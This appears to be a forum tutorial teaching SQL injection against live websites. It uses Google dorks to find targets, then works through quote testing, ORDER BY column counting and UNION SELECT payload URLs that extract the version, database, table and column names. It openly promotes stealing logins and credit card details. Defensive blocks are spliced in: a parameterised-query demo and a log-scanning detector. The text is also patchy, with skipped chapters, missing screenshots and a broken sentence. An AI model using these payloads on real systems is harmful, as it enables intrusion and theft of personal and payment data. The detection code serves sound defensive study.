www.lossieit.co.uk/forums
CHAPTER 1 - Introduction
What is SQL?
SQL (pronounced "ess-que-el") stands for Structured Query Language. SQL is used to communicate with a database. According to ANSI (American National Standards Institute), it is the standard language for relational database management systems. SQL statements are used to perform tasks such as update data on a database, or retrieve data from a database. Some common relational database management systems that use SQL are: Oracle, Sybase, Microsoft SQL Server, Access, Ingres, etc. Although most database systems use SQL, most of them also have their own additional proprietary extensions that are usually only used on their system. However, the standard SQL commands such as "Select", "Insert", "Update", "Delete", "Create", and "Drop" can be used to accomplish almost everything that one needs to do with a database.
What is an SQL injection?
It is an attack technique used by hackers to exploit web sites by altering backend SQL statements through manipulating application input.
SQL Injection happens when a developer accepts user input that is placed directly into a SQL statement without properly filtering out dangerous characters. This can allow an attacker not only to steal data from your database, but also to modify and delete it. Certain SQL servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine. Attackers commonly insert single quotes into a URL's query string, or into a form's input field, to test for SQL injection.
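The mechanism in that paragraph, as an added example that is not from the original tutorial: a Python/sqlite3 stand-in (an assumption; the sites the tutorial targets are PHP against MySQL, but the mechanism is the same) that builds the `id=` lookup by pasting the input into the SQL text, beside the same lookup with a bound parameter, and runs the tutorial's trailing-quote check against both.

```python
import sqlite3

# Constructed in-memory table standing in for a site's index.php?id= lookup
# (assumption: the real site would be PHP against MySQL; the mechanism is the same).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
conn.execute("INSERT INTO items VALUES (1234, 'widget', 9.99)")

def lookup_unsafe(raw_id: str):
    """The pattern the text warns about: user input pasted straight into the SQL text.
    Whatever follows the number in the parameter becomes part of the statement."""
    return conn.execute(f"SELECT name, price FROM items WHERE id = {raw_id}").fetchone()

def lookup_safe(raw_id: str):
    """Same lookup with a bound parameter: the driver hands the input to the database
    as a value, so a stray quote or keyword can never change the statement's shape."""
    return conn.execute("SELECT name, price FROM items WHERE id = ?", (raw_id,)).fetchone()

def probe(lookup, raw_id: str) -> str:
    """Run one lookup and summarise the outcome the way the tutorial's quote test does:
    'error' if the database rejected the statement, otherwise whether a row came back."""
    try:
        row = lookup(raw_id)
    except sqlite3.OperationalError as exc:  # the mangled statement failed to parse
        return f"error: {exc}"
    return "row found" if row else "no row"

if __name__ == "__main__":
    for raw in ("1234", "1234'"):
        print(f"{raw!r:10} unsafe -> {probe(lookup_unsafe, raw)}")
        print(f"{raw!r:10} safe   -> {probe(lookup_safe, raw)}")
```

The unsafe lookup turns the trailing quote into a database error (the signal the tutorial looks for), while the parameterised lookup simply finds no row for the odd value.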
What could I gain from doing this?
Databases for websites contain a lot of information that could be very useful to an attacker. With such information there are many things you could gain, from usernames and passwords for the sites themselves, including the admin details for the site and forum login details, to online shops which store order information such as credit card details and all associated information such as billing addresses, CVV2 numbers and expiry dates. In more malicious circumstances the attacker will gain complete root access to the machine.
their email address and password from one website; it would be the same for many others, including things like PayPal and much more.
How would I find sites that are vulnerable to this attack?
A good way to start searching for sites that are vulnerable to SQL injection is Google. There are many other ways to find these sites, like IRC bots or other search engines; as there are many possibilities for finding vulnerable websites, please feel free to explore other options, but Google is probably the most popular.
CHAPTER 3 - Finding vulnerable sites:
Ok, now you have your Google search engine sorted out and ready to go, we can jump right in and find some vulnerable sites. We will be using various Google Dorks for this, made famous by Johnny Long and his Google Hacking Database (GHDB). The GHDB can be found at the url below, and it will be good for you to see what types of things you can find from your search engine queries; you will be amazed what Google will index.
http://johnny.ihackstuff.com/ghdb.php
Also here is a list of Google search operators
http://www.google.com/help/operators.html
http://www.goolag.org/ <----another nice one from cDc
Open up your custom Google home page and try the following examples (these can be edited to whatever you like)
inurl:php?id=
inurl:php?sid=
inurl:asp?id=
OR
inurl:php?id= site:co.uk (for domain specific sites)
inurl:php?id= site:com
There are many more types of sites that are vulnerable to SQL injection; we will be working with these few for now.
CHAPTER 4 – Test if a website is vulnerable
So we have a list of sites; now let's try and test them to see if they may be vulnerable to injection. We do this by adding a ' character to the end of the URL and seeing if we get any form of error message.
Example: www.site.com/index.php?id=1234'
Error messages will vary from an on-screen message to the page just going blank; a few examples are shown in the screenshots below.
CHAPTER 5 – How many columns?
So now we have found a few sites that throw up errors, we will try to identify how many columns are on the site. We do this by using the ORDER BY command. The command can be used in the few variations listed below.
Example www.site.com/index.php?id=1234+ORDER+BY+1/*
Example www.site.com/index.php?id=1234+ORDER+BY+1--
Example www.site.com/index.php?id=-1+ORDER+BY+1/*
You will be increasing the number 1, looking for the number of columns present on the website. Don't worry if this sounds complicated at the moment; you will soon see how it works with the examples below.
Ok, let's say the site has 18 columns. We need to increase the number 1 to find this out; I would usually go up in amounts of 10 until I get an error or a blank page, like below.
Example www.site.com/index.php?id=1234+ORDER+BY+10/*
Example www.site.com/index.php?id=1234+ORDER+BY+10--
Example www.site.com/index.php?id=-1+ORDER+BY+10/*
The page still displays the same with no changes, so I increase to 20
Example www.site.com/index.php?id=1234+ORDER+BY+20/*
Example www.site.com/index.php?id=1234+ORDER+BY+20--
Example www.site.com/index.php?id=-1+ORDER+BY+20/*
Now I get an error message that says
Unknown column '20' in 'order clause'
This may instead show a blank page or another message.
So from this information I know there are fewer than 20 columns. Now I will go down by 5, as I know the number of columns is between 10 and 20.
Example www.site.com/index.php?id=1234+ORDER+BY+15/*
Example www.site.com/index.php?id=1234+ORDER+BY+15--
Example www.site.com/index.php?id=-1+ORDER+BY+15/*
The page still displays correctly, so I know the number of columns is more than 15 and less than 20.
Example www.site.com/index.php?id=1234+ORDER+BY+16/*
Example www.site.com/index.php?id=1234+ORDER+BY+16--
Example www.site.com/index.php?id=-1+ORDER+BY+16/*
Page displays fine
Example www.site.com/index.php?id=1234+ORDER+BY+17/*
Example www.site.com/index.php?id=1234+ORDER+BY+17--
Example www.site.com/index.php?id=-1+ORDER+BY+17/*
Page displays fine
Example www.site.com/index.php?id=1234+ORDER+BY+18/*
Example www.site.com/index.php?id=1234+ORDER+BY+18--
Example www.site.com/index.php?id=-1+ORDER+BY+18/*
Page displays fine
Example www.site.com/index.php?id=1234+ORDER+BY+19/*
Example www.site.com/index.php?id=1234+ORDER+BY+19--
Example www.site.com/index.php?id=-1+ORDER+BY+19/*
I get an error: Unknown column '19' in 'order clause'
So this tells us that the number of columns on the website is 18.
So what use is this to us? We can now use another command to find out which columns are vulnerable. By vulnerable I mean which columns will display information on screen for us.
In the picture above you can see that columns 2 and 4 are displayed on screen; you can use any of the column numbers you see to display data held in the SQL server. You will see this in the next few steps.
CHAPTER 7 – What Version is Running?
We can now see the vulnerable columns displayed on screen; we will use them to find out the version of the SQL server running on the website, using the various commands listed below.
@@version
Version()
concat_ws(0x3a,version(),user(),database())
and
unhex(hex(@@version))
The unhex command at the bottom is used if you encounter an error similar to the one below when you use any of the above version commands.
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
We will need to take one of the above version commands and put it in place of the column number shown on screen.
Screenshots below of the different version commands
The screenshot above shows a site with 6 columns. Columns 3 and 4 were showing on screen, so we would put @@version in place of either number 3 or number 4 in the url. In this case it was number 4. This shows that the web server uses SQL server version 5.0.32.
Above is the Illegal mix of collations error; below it is the unhex(hex(@@version)) command that will display the version number.
Above you can see that the version of the SQL server is 4.1.
Example urls using a site that has 6 columns, with columns 3 and 4 vulnerable and showing on screen:
www.site.com/index.php?id=1234+AND+1=0+UNION+SELECT+ALL+1,2,@@version,4,5,6/* (column 3)
www.site.com/index.php?id=1234+AND+1=0+UNION+SELECT+ALL+1,2,3,version(),5,6-- (column 4)
www.site.com/index.php?id=1234+AND+1=0+UNION+SELECT+ALL+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6/* (column 4)
www.site.com/index.php?id=1234+AND+1=0+UNION+SELECT+ALL+1,2,unhex(hex(@@version)),4,5,6-- (column 3)
CHAPTER 9 – What Databases are present?
We will be doing the same sort of thing as we did to get the version number, using the exploitable columns that are displayed on screen, but with the command below. Again, our site in this example has 6 columns and columns 3 and 4 are vulnerable.
http://site.com/index.php?id=1234+AND+1=0+UNION+SELECT+ALL+1,2,group_concat(schema_name),4,5,6+from+information_schema.schemata--
In the place of the vulnerable column in this case number 3 we will use the command
group_concat(schema_name)
and at the end of the columns we will add
+from+information_schema.schemata--
This will display the databases on screen; see the screenshot below.
In the example picture above there is 1 database called 7445ftpdb
We could not use the url below on this particular site as it throws up an error
http://site.com/index.php?id=1234+AND+1=0+UNION+SELECT+ALL+1,2,group_concat(schema_name),4,5,6+from+information_schema.schemata/*
As you can see above, the error is complaining about the syntax near /*, so just change it for --
The site above has a few databases: matrixsa, boat, fantactics, mysql and testfantactics
CHAPTER 11 – Finding Column names
So we move onto the next step, which will be viewing the columns that reside in the table we choose; in this case I will choose tbl_accounts, but you could choose any table you wished.
The command used to view what is inside the tables is usually
www.site.com/index.php?id=1234+AND+1=0+UNION+SELECT+ALL+1,2,group_concat(column_name),4,5,6+from+information_schema.columns+where+table_name='tbl_accounts'--
Again we replace the vulnerable column number with the following command.
group_concat(column_name) - we will replace column number 3 with this
And add this to the end of the columns
+from+information_schema.columns+where+table_name='tbl_accounts'--
Or we would, but this site has thrown an error at us; see the image below.
As you can see it is not happy with the syntax 'tbl_accounts'.
If you get an error like this it means you have to encode the table name into hex format. To do this you can visit the website below
http://lab.lowsec.org/Encoder/
Type tbl_accounts, or the table name you are using, into the top box and hit encode. This will give you %74%62%6C%5F%61%63%63%6F%75%6E%74%73, which we will need to format correctly.
We will need to remove all the % signs and add a zero and an x at the front of the hex code, so it would look like this: 0x74626C5F6163636F756E7473
So 0x74626C5F6163636F756E7473 = tbl_accounts
Then we would use the following url
www.site.com/index.php?id=1234+AND+1=0+UNION+SELECT+ALL+1,2,group_concat(column_name ),4,5,6+from+information_schema.columns+where+table_name=0x74626C5F6163636F756E7473--
I hope you can see how this works and understand when you will need to use this hex encoding.
You will then be presented with the columns inside the tbl_accounts table.
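From the defender's side, as an added example that is not part of the original tutorial: a small access-log scanner that flags the request patterns Chapters 4 through 11 describe (the trailing quote on a numeric parameter, the ORDER BY stepping, the UNION SELECT against information_schema and the 0x hex literal), counts how many distinct ORDER BY positions each client tried, and decodes the hex literal back to the table name the request referred to. The log lines, IP addresses and rule names are constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the page) in common log format; the first five
# mirror the tutorial's probes, the last two are ordinary traffic with a real apostrophe.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1234' HTTP/1.1" 500 512
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=1234+ORDER+BY+10/* HTTP/1.1" 200 4812
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?id=1234+ORDER+BY+20-- HTTP/1.1" 500 512
203.0.113.5 - - [10/Oct/2023:13:55:49 +0000] "GET /index.php?id=1234+ORDER+BY+15/* HTTP/1.1" 200 4812
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?id=1234+AND+1=0+UNION+SELECT+ALL+1,2,group_concat(column_name),4,5,6+from+information_schema.columns+where+table_name=0x74626C5F6163636F756E7473-- HTTP/1.1" 200 3990
198.51.100.7 - - [10/Oct/2023:13:57:11 +0000] "GET /index.php?id=1234 HTTP/1.1" 200 4812
198.51.100.7 - - [10/Oct/2023:13:57:15 +0000] "GET /search.php?q=O'Brien HTTP/1.1" 200 2210
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')
ORDER_BY_RE = re.compile(r"\border\s+by\s+(\d+)", re.I)
HEX_RE = re.compile(r"\b0x([0-9a-f]{4,})\b", re.I)
RULES = [  # (name, pattern), matched against the URL-decoded path and query string
    ("order-by-probe", ORDER_BY_RE),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\.", re.I)),
    ("hex-literal", HEX_RE),
    ("quote-after-number", re.compile(r"[?&]\w+=\d+'")),  # numeric params only: O'Brien is not flagged
]

def scan(log_text):
    """Return (findings, stepping). findings: one (ip, rule names, decoded hex literals)
    per flagged request; stepping: the distinct ORDER BY positions each client tried."""
    findings, stepping = [], defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = unquote_plus(m["path"])  # '+' and %XX back to the text the database saw
        hits = [name for name, rx in RULES if rx.search(path)]
        if hits:
            # decode 0x... literals so the analyst sees which object the request named
            decoded = [bytes.fromhex(h).decode("latin-1") for h in HEX_RE.findall(path)]
            findings.append((m["ip"], hits, decoded))
        for n in ORDER_BY_RE.findall(path):
            stepping[m["ip"]].add(int(n))
    return findings, dict(stepping)

def column_count_probers(stepping, threshold=3):
    """Clients that tried at least `threshold` distinct ORDER BY positions: the
    column-counting walk of Chapter 5 (10, 20, 15, 16, ...), whatever the status codes."""
    return sorted(ip for ip, vals in stepping.items() if len(vals) >= threshold)
```

Note that the status codes alone are not enough: the ORDER BY requests that did not error return the same 200 as normal traffic, which is why the scanner keys on the query string and on the stepping pattern per client.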